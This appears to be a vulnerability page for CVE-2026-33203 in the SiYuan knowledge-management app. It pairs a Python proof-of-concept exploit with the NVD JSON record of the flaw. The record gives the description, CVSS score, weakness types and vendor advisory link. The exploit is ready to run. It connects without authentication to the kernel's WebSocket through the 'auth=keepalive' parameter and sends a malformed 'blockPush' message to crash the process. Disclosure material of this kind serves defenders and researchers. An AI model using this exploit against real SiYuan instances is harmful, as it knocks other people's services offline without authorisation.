CVE-2026-33203

import asyncio import websockets import json async def exploit(): # Target URL with the vulnerable query parameter # Note: Default SiYuan WebSocket port is usually 6806 target_url = "ws://<TARGET_IP>:6806/?auth=keepalive" try: # Establish connection without authentication async with websockets.connect(target_url) as websocket: print("[+] Connection established (Unauthenticated)") # Construct malformed JSON payload # This payload is designed to trigger a type assertion panic # by sending a type that the server does not expect. malicious_payload = { "cmd": "blockPush", "data": { "datatype": 12345, # Sending int instead of expected string/object "data": "malicious_content" } } print("[*] Sending malformed payload...") await websocket.send(json.dumps(malicious_payload)) print("[+] Payload sent. Check if the server crashed.") # Try to receive a response (likely to fail or hang if crashed) response = await websocket.recv() print(f"[-] Server response: {response}") except Exception as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": asyncio.run(exploit())

{"cve": {"id": "CVE-2026-33203", "sourceIdentifier": "[email protected]", "published": "2026-03-20T23:16:45.520", "lastModified": "2026-03-23T18:48:43.490", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SiYuan is a personal knowledge management system. Prior to version 3.6.2, the SiYuan kernel WebSocket server accepts unauthenticated connections when a specific \"auth keepalive\" query parameter is present. After connection, incoming messages are parsed using unchecked type assertions on attacker-controlled JSON. A remote attacker can send malformed messages that trigger a runtime panic, potentially crashing the kernel process and causing denial of service. Version 3.6.2 fixes the issue."}, {"lang": "es", "value": "SiYuan es un sistema de gestión de conocimiento personal. Antes de la versión 3.6.2, el servidor WebSocket del kernel de SiYuan acepta conexiones no autenticadas cuando un parámetro de consulta específico 'auth keepalive' está presente. Después de la conexión, los mensajes entrantes se analizan utilizando aserciones de tipo no verificadas en JSON controlado por el atacante. Un atacante remoto puede enviar mensajes malformados que desencadenan un pánico en tiempo de ejecución, lo que podría bloquear el proceso del kernel y causar una denegación de servicio. La versión 3.6.2 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-248"}, {"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.2", "matchCriteriaId": "27CB71A7-7208-417A-AE6D-266D57F683E9"}]}]}], "references": [{"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-3g9h-9hp4-654v", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}